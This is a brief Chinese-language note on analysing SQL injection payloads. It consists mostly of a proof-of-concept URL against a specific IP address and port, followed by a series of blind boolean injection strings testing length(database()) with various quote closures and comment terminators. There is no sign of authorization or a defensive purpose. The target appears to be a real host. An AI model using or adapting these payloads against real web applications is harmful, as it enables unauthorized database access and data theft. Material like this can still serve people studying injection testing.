SQL注入payload解析

SQL注入payload解析
Att@ckxuPOC:
http:/15.8.17.20:8080/jgbs/getPlInstSetOptions.do?_=1755586812374&change=instsetchange%28%29&strSuitCode=14'and+length(database())='4&strTaskID=null&time=1755586812590 |
其中strSuitCode参数存在注入,输入14’时,页面回显异常;输入14’’时,页面回显正常;输入14’’’时,页面回显异常,疑似注入
分析:
猜测查询语句为
select ... from ... where ...'strSuitCode' ... |
strSuitCode为我们传入的参数
传入正常14 '14' 正常查询 |
14’and+length(database())=’4
传入 14'and+length(database())='4 |
14’and+length(database())=4’
传入 1'and+length(database())=4' |
14’and+length(database())=4–+
14’and+length(database())=4–%20
传入 1'and+length(database())=4--+ |
可能为limit子句,导致无法正常注入
14’and+length(database())=4#(需要进行url编码)
传入 1'and+length(database())=4%23 |
14’and+length(database())=4 and ‘1
传入1'and+length(database())=4 and '1 |